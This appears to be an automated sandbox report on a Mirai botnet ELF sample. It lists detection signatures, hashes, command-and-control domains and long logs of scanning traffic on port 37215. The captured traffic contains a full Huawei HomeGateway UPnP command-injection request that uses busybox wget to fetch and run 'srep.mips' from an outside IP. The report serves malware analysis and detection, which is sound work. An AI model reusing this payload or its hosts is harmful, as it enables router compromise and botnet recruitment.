Linux Analysis Report
GZBCPDzO6n.elf

Overview

General Information

Sample name:	GZBCPDzO6n.elf renamed because original name is a hash value
Original sample name:	4613f631c60d02d83c66d2df674ed027.elf
Analysis ID:	1427872
MD5:	4613f631c60d02d83c66d2df674ed027
SHA1:	9df730f36b9465b9f31b397a1703441b4a2b5060
SHA256:	816d18dbb48908539abbc2c45223394d714e7fe971d3fb95d6bd45c9f08bfa4e
Tags:	32armelf
Infos:

Detection

Mirai

Score:	88
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Performs DNS queries with encoded ASCII data (may be used to data exfiltration)

Queries the IP of a very long domain name

Sample deletes itself

Sample is packed with UPX

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

HTTP GET or POST without a user agent

Sample contains only a LOAD segment without any section mappings

Sample listens on a socket

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: GZBCPDzO6n.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: GZBCPDzO6n.elf

ReversingLabs: Detection: 47%

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 156.254.79.98 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.195.138.230 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.73.198.184 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 197.53.1.101 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.73.143.221 ports 1,2,3,5,7,37215

Performs DNS queries with encoded ASCII data (may be used to data exfiltration)

Source: unknown

DNS traffic detected with encoded ASCII: query: rebirth-network.su.@ f`ZZPV!a/EL@@jn_3Dlg>P3yPOST /ctrlt/DeviceUpgrade_1 H.TP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Dig.st username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri=".ctrlt/DeviceUpgrade_1", response="3612f843a42db.8f48f59d2a3597e19c", algorithm="MD5", qop="auth", n.=00000001, cnonce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.x.lsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmln.:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mip.; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDown.oadURL></u:Upgrade></s:Body></s:Envelope>@ fTZZPV!a/ELC/@@tsL_/yPP.POST /ctrlt/DeviceU.grade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf.config", realm="HuaweiHomeGateway", nonce="88.45cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgr.de_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cno.ce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/".s:encodingStyle="http://schemas..mlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(.bin/busybox wget http://79.110.62.86/srep.mips;./bin/busybox chmod 777 * srep.mi.s; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s.Envelope>@ f<<PV!a/E(@@v.m._; decoded parts: b, b

Queries the IP of a very long domain name

Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f?66a/PV!E(/2.=5aM% fAVVP.!a/EH:.@@F=J54secure-core-rebirthltdsu-% .66a/PV!E(C1/=5Jj% fVVPV!a/EH:6.@F=54msecure-core-rebirthltdsu-.%
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f66a/PV!E(C1.=5Jj% fVVP.!a/EH:6@@F=54msecure-core-rebirthltdsu-% .<<PV!a/E(,@-!m._-!P[% f<<PV!a/.(7@3m._3P[3F% fI<<PV!
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f<<PV!a/E(,@
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.% f>66a/PV!E(@7
Source: unknown	DNS traffic detected: query: secure-core-rebirthltd.su.& f#66a/PV!E((@@o
Source: unknown	DNS traffic detected: query: rebirth-network.su.6 f66a/PV!E((@.y_m.zP6 fRRa/PV!
Source: unknown	DNS traffic detected: query: rebirth-network.su.; fkRRa/PV!ED:LJ0E(9R8z'?'m._'?'P[;
Source: unknown	DNS traffic detected: query: rebirth-network.su.@ f`ZZPV!a/EL@@jn_3Dlg>P3yPOST /ctrlt/DeviceUpgrade_1 H.TP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Dig.st username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri=".ctrlt/DeviceUpgrade_1", response="3612f843a42db.8f48f59d2a3597e19c", algorithm="MD5", qop="auth", n.=00000001, cnonce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.x.lsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmln.:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mip.; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDown.oadURL></u:Upgrade></s:Body></s:Envelope>@ fTZZPV!a/ELC/@@tsL_/yPP.POST /ctrlt/DeviceU.grade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf.config", realm="HuaweiHomeGateway", nonce="88.45cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgr.de_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cno.ce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/".s:encodingStyle="http://schemas..mlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(.bin/busybox wget http://79.110.62.86/srep.mips;./bin/busybox chmod 777 * srep.mi.s; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s.Envelope>@ f<<PV!a/E(@@v.m._
Source: unknown	DNS traffic detected: query: rebirth-network.su.E fe66a/PV!EH(@q-/_m./PE fe66a/PV!
Source: unknown	DNS traffic detected: query: rebirth-network.su.J f,\FFa/PV!E8E(k[8;m._8;J fz66

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40254 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56818 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 56818
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47114 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43118 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47576 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56786 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.115.10.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.212.106.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.174.135.120:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.183.115.110:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.191.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.251.79.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.247.245.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.206.175.163:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.110.42.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.0.80.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.3.217.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.72.18.244:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.147.16.117:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.142.59.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.109.191.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.185.211.71:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.22.28.98:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.68.131.208:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.110.194.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.248.141.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.172.252.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.24.143.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.97.41.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.234.95.66:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.106.122.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.135.180.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.207.238.227:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.122.216.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.45.11.31:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.43.117.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.235.194.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.232.119.47:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.227.160.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.90.163.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.227.138.149:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.8.245.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.18.43.241:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.220.166.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.203.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.242.91.79:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.84.161.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.73.91.220:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.80.125.123:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.189.57.158:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.76.235.108:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.97.215.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.43.88.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.105.109.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.30.101.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.29.159.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.107.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.55.14.170:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.31.158.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.243.236.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.254.204.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.66.60.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.62.62.91:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.59.48.251:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.212.168.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.35.55.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.206.136.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.99.77.105:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.56.126.197:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.69.47.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.173.47.188:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.235.107.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.197.128.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.250.44.201:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.161.47.158:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.2.132.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.166.197.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.39.19.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.27.39.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.81.20.12:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.30.142.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.44.106.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.194.90.156:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.29.143.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.88.242.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.82.17.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.37.72.39:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.242.68.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.232.17.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.42.158.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.168.7.198:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.243.46.132:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.87.162.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.38.58.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.149.26.51:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.82.102.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.209.213.70:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.230.221.66:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.54.155.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.47.187.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.158.215.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.213.31.162:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.164.103.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.233.89.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.147.0.106:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.9.19.121:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.10.120.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.181.251.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.151.185.126:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.15.145.157:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.60.88.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.179.71.129:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.246.189.68:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.49.66.44:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.62.20.14:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.92.54.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.224.244.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.113.229.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.72.171.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.188.212.229:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.240.161.62:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.184.225.195:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.60.247.1:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.71.37.7:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.122.86.105:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.121.62.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.169.189.247:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.91.77.29:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.109.179.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.30.55.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.47.158.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.216.144.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.22.40.41:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.178.49.99:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.194.123.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.170.230.190:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.32.161.191:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.111.95.214:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.54.209.37:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.87.77.119:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.96.127.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.104.31.72:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.180.26.10:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.117.87.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.3.38.55:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.195.218.117:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.107.81.93:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.152.89.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.108.232.18:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.66.9.102:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.142.93.160:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.41.35.135:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.10.242.71:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.143.110.55:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.105.26.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.219.101.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.176.204.139:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.57.241.9:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.214.192.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.234.248.18:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.175.231.20:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.12.37.203:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.204.172.67:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.68.172.23:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.235.55.153:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.104.7.149:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.24.140.212:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.129.119.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.124.172.94:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.80.177.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.103.145.215:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.48.244.176:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.251.20.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.138.65.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.152.47.122:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.175.44.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.37.103.66:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.147.57.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.17.168.182:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.54.164.51:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.106.22.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.230.131.59:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.86.132.9:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.129.208.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.40.106.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.71.8.225:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.60.202.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.78.45.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.1.168.221:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.224.25.201:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.248.202.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.242.10.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.75.214.173:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.106.67.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.229.79.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.150.121.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.68.129.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.51.117.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.179.13.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.136.70.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.179.230.53:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.38.242.190:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.181.240.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.176.38.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.73.72.238:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.231.58.123:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.108.66.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.254.249.246:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.225.88.19:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.56.245.164:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.208.197.158:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.182.3.205:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.214.95.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.160.66.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.17.245.67:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.144.3.213:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.15.101.65:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.214.169.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.191.206.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.79.185.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.140.123.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.178.105.134:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.22.239.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.60.250.223:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.112.241.232:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.38.183.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:27950 -> 197.137.70.115:37215
